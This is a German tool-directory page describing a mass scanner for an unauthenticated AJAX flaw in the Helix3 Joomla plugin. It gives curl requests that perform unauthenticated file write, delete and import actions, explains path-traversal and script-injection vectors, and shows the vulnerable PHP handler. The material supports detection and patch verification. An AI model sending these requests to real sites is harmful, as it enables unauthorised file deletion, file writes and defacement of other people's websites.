Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-49049 — Schreibgeschützter Schwachstellen-Scanner für CVE-2026-49049 — Helix3-Joomla-Plugin nicht authentifizierter AJAX-Handler | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-49049
SchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubshinthink/cve-2026-49049

CVE-2026-49049

Schreibgeschützter Schwachstellen-Scanner für CVE-2026-49049 — Helix3-Joomla-Plugin nicht authentifizierter AJAX-Handler

Repository anzeigen
4vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python CVE CVSS License

CVE-2026-49049 — Helix3 Joomla Plugin (JoomShaper)

Nicht authentifizierter AJAX-Handler — Nur-Lese-Schwachstellen-Scanner


Übersicht

CVE-2026-49049 betrifft das Helix3-Template-Framework für Joomla (Versionen 1.0 bis 3.1.0). Der onAjaxHelix3-Handler, der über Joomlas com_ajax-Dispatcher erreichbar ist, führt bei mehreren destruktiven Aktionen keine Authentifizierungs-, Autorisierungs- oder CSRF-Prüfung durch:

Hinweis: Die import-Aktion wurde in Helix3 v3.x hinzugefügt. Websites, die v2.x ausführen, sind nur von save und remove betroffen.

Die Schwachstelle wurde von Phil Taylor (mySites.guru) entdeckt und am 29. Juni 2026 veröffentlicht.

Betroffene Versionen

Helix3-Versionsave/removeimport
1.0 – 2.xAnfälligNicht vorhanden
3.0 – 3.1.0AnfälligAnfällig
3.1.1+GepatchtGepatcht

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

Verwendung

root@kitploit:~
# Single target
python cve_2026_49049.py -t 192.168.1.100

# Mass scan
python cve_2026_49049.py -f targets.txt -o results.txt

# With JSON report + verbose
python cve_2026_49049.py -f targets.txt --json report.json -v

Argumente

root@kitploit:~
  -t, --target     Single target (domain or IP)
  -f, --file       File with targets, one per line
  -o, --output     Real-time text output (default: cve-2026-49049_scan.txt)
  --json           Structured JSON report (default: cve-2026-49049_report.json)
  --threads        Concurrent workers (default: 15)
  --timeout        HTTP timeout in seconds (default: 15)
  -v, --verbose    Show probe details

Proof of Concept

Erkennung & Validierung

Der Scanner führt eine Nur-Lese-Sonde durch — er schreibt über den nicht authentifizierten save-Endpunkt eine harmlose JSON-Datei in den Helix3-Layout-Ordner, prüft, ob sie geschrieben wurde, und löscht sie anschließend sofort über den remove-Endpunkt. Auf dem Zielsystem bleiben keine dauerhaften Änderungen zurück.

root@kitploit:~
$ python cve_2026_49049.py -t 192.168.1.100 -v
root@kitploit:~
    CVE-2026-49049 — Helix3 (JoomShaper)
    Joomla Unauthenticated AJAX Handler Scanner

    [*] save   — accessible (probe: 3a9719da)
    [*] remove — accessible (probe cleaned)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s

Manuelle Reproduktion

Der Scanner testet genau diese Endpunkte. Zur manuellen Überprüfung:

Schritt 1 — Bestätigen, dass Helix3 installiert ist

root@kitploit:~
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Look for <version>X.X.X</version>

Schritt 2 — save-Aktion testen (nicht authentifiziertes Schreiben von Dateien)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

Schritt 3 — remove-Aktion testen (nicht authentifiziertes Löschen von Dateien)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'

Schritt 4 — import-Aktion testen (nur v3.x, in v2.x nicht verfügbar)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Note: import was added in Helix3 v3.x.
# Sites running v2.x will return an empty response for this action.

Mechanismus der Schwachstelle

In Helix3-Versionen vor 3.1.1 verarbeitet plugins/ajax/helix3/helix3.php Anfragen über onAjaxHelix3() ohne jede Absicherung:

root@kitploit:~
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // No auth check. No CSRF token. No path validation.
    $filepath = $layoutPath . $layoutName;   // path traversal possible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // arbitrary file delete
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // write
            break;
    }
}

Warum das gefährlich ist

  • Save + Path Traversal — layoutName=../../../somewhere/evil schreibt Dateien außerhalb des vorgesehenen Layout-Verzeichnisses
  • Remove hat keine Erweiterungsbeschränkung — im Gegensatz zu save (das .json anhängt) kann remove jeden Dateityp anvisieren
  • Import (v3.x) überschreibt Datenbank-Parameter — custom_js wird nicht maskiert in der Template-Ausgabe gerendert, was auf jeder Seite Script-Injection ermöglicht. Dies ist der Vektor, der bei realen Defacement-Angriffen verwendet wird.

Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS.

Diese Software richtet sich an Sicherheitsexperten, die autorisierte Penetrationstests durchführen, an Organisationen, die ihre eigene Infrastruktur prüfen, sowie an Forscher, die die Ausnutzung von Schwachstellen untersuchen.

Unbefugter Zugriff auf Computersysteme ist illegal und kann gegen folgende Gesetze verstoßen:

  • Vereinigte Staaten: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesien: UU ITE Pasal 30 & 46
  • Europäische Union: Richtlinie 2013/40/EU
  • Vereinigtes Königreich: Computer Misuse Act 1990

Die Autoren übernehmen keine Haftung für Missbrauch. Durch die Nutzung dieser Software übernehmen Sie die volle Verantwortung für Ihre Handlungen.


Referenzen

Ressource

Dieses Projekt ist weder mit JoomShaper, Joomla noch mit Open Source Matters, Inc. verbunden.

Tool herunterladen
AktionAuswirkungVerfügbar in
saveSchreibt angreiferkontrollierte JSON-Dateien mit Path TraversalAlle Versionen
removeLöscht beliebige Dateien — keine Erweiterungs- oder PfadbeschränkungAlle Versionen
importÜberschreibt gespeicherte Template-Parameter in der Datenbanknur v3.x
Link
Ursprüngliches Advisory (mySites.guru)Helix3 3.1.1 Security Fix
NVD-EintragCVE-2026-49049
OpenCVECVE-2026-49049
JoomShaper GitHubHelix3 Repository